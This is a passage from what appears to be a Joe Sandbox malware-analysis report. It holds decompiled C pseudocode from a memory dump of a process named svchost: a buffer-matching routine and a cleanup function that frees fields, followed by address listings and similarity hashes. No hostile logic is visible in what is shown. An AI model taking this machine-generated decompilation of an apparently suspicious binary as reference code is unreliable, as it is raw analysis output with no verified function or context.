                                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                                    																_v8 = _v84;
                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                                                                    															_v64 = E040070A0( *((intOrPtr*)(0x429f28 + _v48 * 4)));
                                                                                                                                                                                                                                                    															_v60 = _v64 + 4;
                                                                                                                                                                                                                                                    															_v88 = E04020CE0(_v60 + 1);
                                                                                                                                                                                                                                                    															_v56 = _v88;
                                                                                                                                                                                                                                                    															_push(2);
                                                                                                                                                                                                                                                    															E04006CA0(_t292, _t394, _t395, _v56, 0x426c50);
                                                                                                                                                                                                                                                    															_push(_v64);
                                                                                                                                                                                                                                                    															E04006CA0(_t292, _t394, _t395, _v56 + 2,  *((intOrPtr*)(0x429f28 + _v48 * 4)));
                                                                                                                                                                                                                                                    															_push(2);
                                                                                                                                                                                                                                                    															E04006CA0(_t292, _t394, _t395, _v56 + _v64 + 2, 0x426c54);
                                                                                                                                                                                                                                                    															_t396 = _t396 + 0x2c;
                                                                                                                                                                                                                                                    															 *((char*)(_v56 + _v60)) = 0;
                                                                                                                                                                                                                                                    															_v68 = _v40 + 2;
                                                                                                                                                                                                                                                    															while(_v68 < _v16 - _v60) {
                                                                                                                                                                                                                                                    																_t260 = E040072C4(_v12 + _v68, _v56, _v60);
                                                                                                                                                                                                                                                    																_t396 = _t396 + 0xc;
                                                                                                                                                                                                                                                    																if(_t260 != 0) {
                                                                                                                                                                                                                                                    																	L55:
                                                                                                                                                                                                                                                    																	_v68 = _v68 + 1;
                                                                                                                                                                                                                                                    																	continue;
                                                                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                                                                    																	_v73 = 0 | _v48 == 0x00000005;
                                                                                                                                                                                                                                                    																	_v72 = E04013F50(_t292, _v120, _t394, _t395, _a4, _v40 + 2, _v68 - _v40 + 2, _v73 & 0x000000ff, _a20 & 0x000000ff);
                                                                                                                                                                                                                                                    																	if(_v72 == 0) {
                                                                                                                                                                                                                                                    																		_t267 = E04020CE0(0x38);
                                                                                                                                                                                                                                                    																		_t396 = _t396 + 4;
                                                                                                                                                                                                                                                    																		_v92 = _t267;
                                                                                                                                                                                                                                                    																		if(_v92 == 0) {
                                                                                                                                                                                                                                                    																			_v124 = 0;
                                                                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                                                                    																			_v124 = E04010CD0(_v92);
                                                                                                                                                                                                                                                    																		}
                                                                                                                                                                                                                                                    																		_v80 = _v124;
                                                                                                                                                                                                                                                    																		_t160 = _v40 + 2; // 0x2
                                                                                                                                                                                                                                                    																		if((E04010D70(_t292, _v80, _t394, _t395,  *((intOrPtr*)(0x429f10 + _v48 * 4)), _v12 + _t160, _v68 - _v40 + 2, _v20, _v68 + _v60 - _v20) & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    																			if(_v80 != 0) {
                                                                                                                                                                                                                                                    																				_v100 = _v80;
                                                                                                                                                                                                                                                    																				_v96 = _v100;
                                                                                                                                                                                                                                                    																				if(_v96 == 0) {
                                                                                                                                                                                                                                                    																					_v128 = 0;
                                                                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                                                                    																					_v128 = E04006780(_v96, 1);
                                                                                                                                                                                                                                                    																				}
                                                                                                                                                                                                                                                    																				_v80 = 0x666;
                                                                                                                                                                                                                                                    																			}
                                                                                                                                                                                                                                                    																			goto L55;
                                                                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                                                                    																			_v8 = _v80;
                                                                                                                                                                                                                                                    																		}
                                                                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                                                                    																		_v8 = _v72;
                                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                    																break;
                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                    															if(_v56 != 0) {
                                                                                                                                                                                                                                                    																_v104 = _v56;
                                                                                                                                                                                                                                                    																E04020CC0(_v104);
                                                                                                                                                                                                                                                    																_t396 = _t396 + 4;
                                                                                                                                                                                                                                                    																_v56 = 0x666;
                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                    															goto L69;
                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                                    														_v20 = _v40 + 2;
                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                    												break;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											if(_v8 == 0) {
                                                                                                                                                                                                                                                    												goto L74;
                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                    											_v8 = _v28;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							if(0 != 0) {
                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					L76:
                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				goto L76;
                                                                                                                                                                                                                                                    			}
















































                                                                                                                                                                                                                                                    0x04013f50
                                                                                                                                                                                                                                                    0x04013f50
                                                                                                                                                                                                                                                    0x04013f50
                                                                                                                                                                                                                                                    0x04013f59
                                                                                                                                                                                                                                                    0x04013f5c
                                                                                                                                                                                                                                                    0x04013f63
                                                                                                                                                                                                                                                    0x04013f86
                                                                                                                                                                                                                                                    0x04013f99
                                                                                                                                                                                                                                                    0x04013fa4
                                                                                                                                                                                                                                                    0x04013faf
                                                                                                                                                                                                                                                    0x04013faf
                                                                                                                                                                                                                                                    0x04013fb7
                                                                                                                                                                                                                                                    0x04013fc0
                                                                                                                                                                                                                                                    0x04013fc6
                                                                                                                                                                                                                                                    0x04013fd4
                                                                                                                                                                                                                                                    0x04013fe0
                                                                                                                                                                                                                                                    0x04013ff2
                                                                                                                                                                                                                                                    0x04013ff7
                                                                                                                                                                                                                                                    0x04013ffc
                                                                                                                                                                                                                                                    0x04014011
                                                                                                                                                                                                                                                    0x04014016
                                                                                                                                                                                                                                                    0x0401401b
                                                                                                                                                                                                                                                    0x0401443e
                                                                                                                                                                                                                                                    0x04013fd1
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04014021
                                                                                                                                                                                                                                                    0x04014027
                                                                                                                                                                                                                                                    0x04014029
                                                                                                                                                                                                                                                    0x0401403b
                                                                                                                                                                                                                                                    0x0401404c
                                                                                                                                                                                                                                                    0x04014051
                                                                                                                                                                                                                                                    0x04014054
                                                                                                                                                                                                                                                    0x0401405a
                                                                                                                                                                                                                                                    0x04014065
                                                                                                                                                                                                                                                    0x0401406c
                                                                                                                                                                                                                                                    0x04014070
                                                                                                                                                                                                                                                    0x04014079
                                                                                                                                                                                                                                                    0x04014038
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0401407b
                                                                                                                                                                                                                                                    0x0401407b
                                                                                                                                                                                                                                                    0x0401407b
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04014079
                                                                                                                                                                                                                                                    0x0401403b
                                                                                                                                                                                                                                                    0x04014083
                                                                                                                                                                                                                                                    0x0401408a
                                                                                                                                                                                                                                                    0x040140ac
                                                                                                                                                                                                                                                    0x040140b1
                                                                                                                                                                                                                                                    0x040140b9
                                                                                                                                                                                                                                                    0x040140be
                                                                                                                                                                                                                                                    0x040140be
                                                                                                                                                                                                                                                    0x040140c1
                                                                                                                                                                                                                                                    0x040140ce
                                                                                                                                                                                                                                                    0x040140ef
                                                                                                                                                                                                                                                    0x040140ef
                                                                                                                                                                                                                                                    0x040140f6
                                                                                                                                                                                                                                                    0x0401410e
                                                                                                                                                                                                                                                    0x0401411c
                                                                                                                                                                                                                                                    0x04014136
                                                                                                                                                                                                                                                    0x0401413b
                                                                                                                                                                                                                                                    0x04014140
                                                                                                                                                                                                                                                    0x04014429
                                                                                                                                                                                                                                                    0x0401442d
                                                                                                                                                                                                                                                    0x04014119
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0401442f
                                                                                                                                                                                                                                                    0x04014146
                                                                                                                                                                                                                                                    0x0401414c
                                                                                                                                                                                                                                                    0x04014162
                                                                                                                                                                                                                                                    0x04014166
                                                                                                                                                                                                                                                    0x04014174
                                                                                                                                                                                                                                                    0x04014187
                                                                                                                                                                                                                                                    0x0401418e
                                                                                                                                                                                                                                                    0x04014385
                                                                                                                                                                                                                                                    0x0401438a
                                                                                                                                                                                                                                                    0x0401438d
                                                                                                                                                                                                                                                    0x04014394
                                                                                                                                                                                                                                                    0x040143a3
                                                                                                                                                                                                                                                    0x04014396
                                                                                                                                                                                                                                                    0x0401439e
                                                                                                                                                                                                                                                    0x0401439e
                                                                                                                                                                                                                                                    0x040143ad
                                                                                                                                                                                                                                                    0x040143d0
                                                                                                                                                                                                                                                    0x040143e2
                                                                                                                                                                                                                                                    0x040143f2
                                                                                                                                                                                                                                                    0x040143f7
                                                                                                                                                                                                                                                    0x040143fd
                                                                                                                                                                                                                                                    0x04014404
                                                                                                                                                                                                                                                    0x04014418
                                                                                                                                                                                                                                                    0x04014406
                                                                                                                                                                                                                                                    0x04014410
                                                                                                                                                                                                                                                    0x04014410
                                                                                                                                                                                                                                                    0x04014422
                                                                                                                                                                                                                                                    0x04014422
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040143e4
                                                                                                                                                                                                                                                    0x040143e7
                                                                                                                                                                                                                                                    0x040143e7
                                                                                                                                                                                                                                                    0x04014194
                                                                                                                                                                                                                                                    0x040141a7
                                                                                                                                                                                                                                                    0x040141b0
                                                                                                                                                                                                                                                    0x040141c2
                                                                                                                                                                                                                                                    0x040141c8
                                                                                                                                                                                                                                                    0x040141cb
                                                                                                                                                                                                                                                    0x040141d6
                                                                                                                                                                                                                                                    0x040141e1
                                                                                                                                                                                                                                                    0x040141f4
                                                                                                                                                                                                                                                    0x040141fc
                                                                                                                                                                                                                                                    0x0401420e
                                                                                                                                                                                                                                                    0x04014213
                                                                                                                                                                                                                                                    0x0401421c
                                                                                                                                                                                                                                                    0x04014225
                                                                                                                                                                                                                                                    0x04014233
                                                                                                                                                                                                                                                    0x04014251
                                                                                                                                                                                                                                                    0x04014256
                                                                                                                                                                                                                                                    0x0401425b
                                                                                                                                                                                                                                                    0x0401435a
                                                                                                                                                                                                                                                    0x04014230
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04014261
                                                                                                                                                                                                                                                    0x0401426a
                                                                                                                                                                                                                                                    0x04014296
                                                                                                                                                                                                                                                    0x0401429d
                                                                                                                                                                                                                                                    0x040142b1
                                                                                                                                                                                                                                                    0x040142b6
                                                                                                                                                                                                                                                    0x040142b9
                                                                                                                                                                                                                                                    0x040142c0
                                                                                                                                                                                                                                                    0x040142cf
                                                                                                                                                                                                                                                    0x040142c2
                                                                                                                                                                                                                                                    0x040142ca
                                                                                                                                                                                                                                                    0x040142ca
                                                                                                                                                                                                                                                    0x040142d9
                                                                                                                                                                                                                                                    0x040142fc
                                                                                                                                                                                                                                                    0x04014319
                                                                                                                                                                                                                                                    0x04014329
                                                                                                                                                                                                                                                    0x0401432e
                                                                                                                                                                                                                                                    0x04014334
                                                                                                                                                                                                                                                    0x0401433b
                                                                                                                                                                                                                                                    0x0401434c
                                                                                                                                                                                                                                                    0x0401433d
                                                                                                                                                                                                                                                    0x04014347
                                                                                                                                                                                                                                                    0x04014347
                                                                                                                                                                                                                                                    0x04014353
                                                                                                                                                                                                                                                    0x04014353
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0401431b
                                                                                                                                                                                                                                                    0x0401431e
                                                                                                                                                                                                                                                    0x0401431e
                                                                                                                                                                                                                                                    0x0401429f
                                                                                                                                                                                                                                                    0x040142a2
                                                                                                                                                                                                                                                    0x040142a2
                                                                                                                                                                                                                                                    0x0401429d
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0401425b
                                                                                                                                                                                                                                                    0x04014363
                                                                                                                                                                                                                                                    0x04014368
                                                                                                                                                                                                                                                    0x0401436f
                                                                                                                                                                                                                                                    0x04014374
                                                                                                                                                                                                                                                    0x04014377
                                                                                                                                                                                                                                                    0x04014377
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0401437e
                                                                                                                                                                                                                                                    0x0401414e
                                                                                                                                                                                                                                                    0x04014154
                                                                                                                                                                                                                                                    0x04014154
                                                                                                                                                                                                                                                    0x0401414c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04014140
                                                                                                                                                                                                                                                    0x0401443a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0401443c
                                                                                                                                                                                                                                                    0x040140f8
                                                                                                                                                                                                                                                    0x040140fb
                                                                                                                                                                                                                                                    0x040140fb
                                                                                                                                                                                                                                                    0x040140f6
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04013ffe
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04013ffc
                                                                                                                                                                                                                                                    0x04014445
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04013f9b
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04013f88
                                                                                                                                                                                                                                                    0x0401444b
                                                                                                                                                                                                                                                    0x04014451
                                                                                                                                                                                                                                                    0x04014451
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _memcmp
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2931989736-0
                                                                                                                                                                                                                                                    • Opcode ID: 4ab6c835b3a8d386f7d6cb5b157b7cd7d659ba90d45b0f81057a5aa373f928b3
                                                                                                                                                                                                                                                    • Instruction ID: 1232f30742209602bb969d2521b285a9e46184637cee8bf4b984800216b21bdb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ab6c835b3a8d386f7d6cb5b157b7cd7d659ba90d45b0f81057a5aa373f928b3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EF125B0E04219DFDB14DFA8D894BEEBBB1BF48308F148119E415BB2A5D774AA41CF91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E04023C90(intOrPtr __ecx) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                                                                    				intOrPtr _v76;
                                                                                                                                                                                                                                                    				intOrPtr _v80;
                                                                                                                                                                                                                                                    				intOrPtr _v84;
                                                                                                                                                                                                                                                    				intOrPtr _v88;
                                                                                                                                                                                                                                                    				intOrPtr _v92;
                                                                                                                                                                                                                                                    				intOrPtr _v96;
                                                                                                                                                                                                                                                    				intOrPtr _v100;
                                                                                                                                                                                                                                                    				signed int _v104;
                                                                                                                                                                                                                                                    				signed int _v108;
                                                                                                                                                                                                                                                    				signed int _v112;
                                                                                                                                                                                                                                                    				signed int _v116;
                                                                                                                                                                                                                                                    				signed int _v120;
                                                                                                                                                                                                                                                    				signed int _v124;
                                                                                                                                                                                                                                                    				intOrPtr _v128;
                                                                                                                                                                                                                                                    				intOrPtr _t210;
                                                                                                                                                                                                                                                    				void* _t213;
                                                                                                                                                                                                                                                    				void* _t324;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v100 = __ecx;
                                                                                                                                                                                                                                                    				if( *((intOrPtr*)(_v100 + 0x58)) != 0) {
                                                                                                                                                                                                                                                    					_v28 =  *((intOrPtr*)(_v100 + 0x58));
                                                                                                                                                                                                                                                    					_v24 = _v28;
                                                                                                                                                                                                                                                    					if(_v24 == 0) {
                                                                                                                                                                                                                                                    						_v104 = 0;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_v104 = E040050D0(_v24, 1);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_v100 + 0x58)) = 0x666;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if( *((intOrPtr*)(_v100 + 4)) != 0) {
                                                                                                                                                                                                                                                    					_v32 =  *((intOrPtr*)(_v100 + 4));
                                                                                                                                                                                                                                                    					E04020CC0(_v32);
                                                                                                                                                                                                                                                    					_t324 = _t324 + 4;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_v100 + 4)) = 0x666;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if( *((intOrPtr*)(_v100 + 0x14)) != 0) {
                                                                                                                                                                                                                                                    					_v40 =  *((intOrPtr*)(_v100 + 0x14));
                                                                                                                                                                                                                                                    					_v36 = _v40;
                                                                                                                                                                                                                                                    					if(_v36 == 0) {
                                                                                                                                                                                                                                                    						_v108 = 0;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_v108 = E04005100(_v36, 1);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_v100 + 0x14)) = 0x666;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t210 = _v100;
                                                                                                                                                                                                                                                    				if( *((intOrPtr*)(_t210 + 0x18)) != 0) {
                                                                                                                                                                                                                                                    					_v48 =  *((intOrPtr*)(_v100 + 0x18));
                                                                                                                                                                                                                                                    					_t210 = _v48;
                                                                                                                                                                                                                                                    					_v44 = _t210;
                                                                                                                                                                                                                                                    					if(_v44 == 0) {
                                                                                                                                                                                                                                                    						_v112 = 0;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_t210 = E04005130(_v44, 1);
                                                                                                                                                                                                                                                    						_v112 = _t210;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_v100 + 0x18)) = 0x666;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if( *((intOrPtr*)(_v100 + 0x20)) > 0) {
                                                                                                                                                                                                                                                    					_t210 = _v100;
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t210 + 0x1c)) != 0) {
                                                                                                                                                                                                                                                    						_v8 = 0;
                                                                                                                                                                                                                                                    						while(_v8 <  *((intOrPtr*)(_v100 + 0x20))) {
                                                                                                                                                                                                                                                    							if( *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x1c)) + _v8 * 4)) != 0) {
                                                                                                                                                                                                                                                    								_v56 =  *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x1c)) + _v8 * 4));
                                                                                                                                                                                                                                                    								_v52 = _v56;
                                                                                                                                                                                                                                                    								if(_v52 == 0) {
                                                                                                                                                                                                                                                    									_v116 = 0;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_v116 = E04005160(_v52, 1);
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								 *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x1c)) + _v8 * 4)) = 0x666;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v8 = _v8 + 1;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t210 = _v100;
                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t210 + 0x1c)) != 0) {
                                                                                                                                                                                                                                                    							_v60 =  *((intOrPtr*)(_v100 + 0x1c));
                                                                                                                                                                                                                                                    							_t210 = E04020CC0(_v60);
                                                                                                                                                                                                                                                    							_t324 = _t324 + 4;
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_v100 + 0x1c)) = 0x666;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if( *((intOrPtr*)(_v100 + 0x2c)) > 0) {
                                                                                                                                                                                                                                                    					_t210 = _v100;
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t210 + 0x28)) != 0) {
                                                                                                                                                                                                                                                    						_v12 = 0;
                                                                                                                                                                                                                                                    						while(_v12 <  *((intOrPtr*)(_v100 + 0x2c))) {
                                                                                                                                                                                                                                                    							if( *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x28)) + _v12 * 4)) != 0) {
                                                                                                                                                                                                                                                    								_v68 =  *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x28)) + _v12 * 4));
                                                                                                                                                                                                                                                    								_v64 = _v68;
                                                                                                                                                                                                                                                    								if(_v64 == 0) {
                                                                                                                                                                                                                                                    									_v120 = 0;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_v120 = E04005190(_v64, 1);
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								 *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x28)) + _v12 * 4)) = 0x666;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v12 = _v12 + 1;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t210 = _v100;
                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t210 + 0x28)) != 0) {
                                                                                                                                                                                                                                                    							_v72 =  *((intOrPtr*)(_v100 + 0x28));
                                                                                                                                                                                                                                                    							_t210 = E04020CC0(_v72);
                                                                                                                                                                                                                                                    							_t324 = _t324 + 4;
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_v100 + 0x28)) = 0x666;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if( *((intOrPtr*)(_v100 + 0x38)) > 0) {
                                                                                                                                                                                                                                                    					_t210 = _v100;
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t210 + 0x34)) != 0) {
                                                                                                                                                                                                                                                    						_v16 = 0;
                                                                                                                                                                                                                                                    						while(_v16 <  *((intOrPtr*)(_v100 + 0x38))) {
                                                                                                                                                                                                                                                    							if( *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x34)) + _v16 * 4)) != 0) {
                                                                                                                                                                                                                                                    								_v80 =  *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x34)) + _v16 * 4));
                                                                                                                                                                                                                                                    								_v76 = _v80;
                                                                                                                                                                                                                                                    								if(_v76 == 0) {
                                                                                                                                                                                                                                                    									_v124 = 0;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_v124 = E040051C0(_v76, 1);
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								 *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x34)) + _v16 * 4)) = 0x666;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t210 = _v100;
                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t210 + 0x34)) != 0) {
                                                                                                                                                                                                                                                    							_v84 =  *((intOrPtr*)(_v100 + 0x34));
                                                                                                                                                                                                                                                    							_t210 = E04020CC0(_v84);
                                                                                                                                                                                                                                                    							_t324 = _t324 + 4;
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_v100 + 0x34)) = 0x666;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if( *((intOrPtr*)(_v100 + 0x44)) > 0) {
                                                                                                                                                                                                                                                    					_t210 = _v100;
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t210 + 0x40)) != 0) {
                                                                                                                                                                                                                                                    						_v20 = 0;
                                                                                                                                                                                                                                                    						while(_v20 <  *((intOrPtr*)(_v100 + 0x44))) {
                                                                                                                                                                                                                                                    							if( *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x40)) + _v20 * 4)) != 0) {
                                                                                                                                                                                                                                                    								_v92 =  *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x40)) + _v20 * 4));
                                                                                                                                                                                                                                                    								_v88 = _v92;
                                                                                                                                                                                                                                                    								if(_v88 == 0) {
                                                                                                                                                                                                                                                    									_v128 = 0;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_v128 = E040051F0(_v88, 1);
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								 *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x40)) + _v20 * 4)) = 0x666;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v20 = _v20 + 1;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t210 = _v100;
                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t210 + 0x40)) != 0) {
                                                                                                                                                                                                                                                    							_v96 =  *((intOrPtr*)(_v100 + 0x40));
                                                                                                                                                                                                                                                    							_t213 = E04020CC0(_v96);
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_v100 + 0x40)) = 0x666;
                                                                                                                                                                                                                                                    							return _t213;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _t210;
                                                                                                                                                                                                                                                    			}





































                                                                                                                                                                                                                                                    0x04023c96
                                                                                                                                                                                                                                                    0x04023ca0
                                                                                                                                                                                                                                                    0x04023ca8
                                                                                                                                                                                                                                                    0x04023cae
                                                                                                                                                                                                                                                    0x04023cb5
                                                                                                                                                                                                                                                    0x04023cc6
                                                                                                                                                                                                                                                    0x04023cb7
                                                                                                                                                                                                                                                    0x04023cc1
                                                                                                                                                                                                                                                    0x04023cc1
                                                                                                                                                                                                                                                    0x04023cd0
                                                                                                                                                                                                                                                    0x04023cd0
                                                                                                                                                                                                                                                    0x04023cde
                                                                                                                                                                                                                                                    0x04023ce6
                                                                                                                                                                                                                                                    0x04023ced
                                                                                                                                                                                                                                                    0x04023cf2
                                                                                                                                                                                                                                                    0x04023cf8
                                                                                                                                                                                                                                                    0x04023cf8
                                                                                                                                                                                                                                                    0x04023d06
                                                                                                                                                                                                                                                    0x04023d0e
                                                                                                                                                                                                                                                    0x04023d14
                                                                                                                                                                                                                                                    0x04023d1b
                                                                                                                                                                                                                                                    0x04023d2c
                                                                                                                                                                                                                                                    0x04023d1d
                                                                                                                                                                                                                                                    0x04023d27
                                                                                                                                                                                                                                                    0x04023d27
                                                                                                                                                                                                                                                    0x04023d36
                                                                                                                                                                                                                                                    0x04023d36
                                                                                                                                                                                                                                                    0x04023d3d
                                                                                                                                                                                                                                                    0x04023d44
                                                                                                                                                                                                                                                    0x04023d4c
                                                                                                                                                                                                                                                    0x04023d4f
                                                                                                                                                                                                                                                    0x04023d52
                                                                                                                                                                                                                                                    0x04023d59
                                                                                                                                                                                                                                                    0x04023d6a
                                                                                                                                                                                                                                                    0x04023d5b
                                                                                                                                                                                                                                                    0x04023d60
                                                                                                                                                                                                                                                    0x04023d65
                                                                                                                                                                                                                                                    0x04023d65
                                                                                                                                                                                                                                                    0x04023d74
                                                                                                                                                                                                                                                    0x04023d74
                                                                                                                                                                                                                                                    0x04023d82
                                                                                                                                                                                                                                                    0x04023d88
                                                                                                                                                                                                                                                    0x04023d8f
                                                                                                                                                                                                                                                    0x04023d95
                                                                                                                                                                                                                                                    0x04023da7
                                                                                                                                                                                                                                                    0x04023dbf
                                                                                                                                                                                                                                                    0x04023dcd
                                                                                                                                                                                                                                                    0x04023dd3
                                                                                                                                                                                                                                                    0x04023dda
                                                                                                                                                                                                                                                    0x04023deb
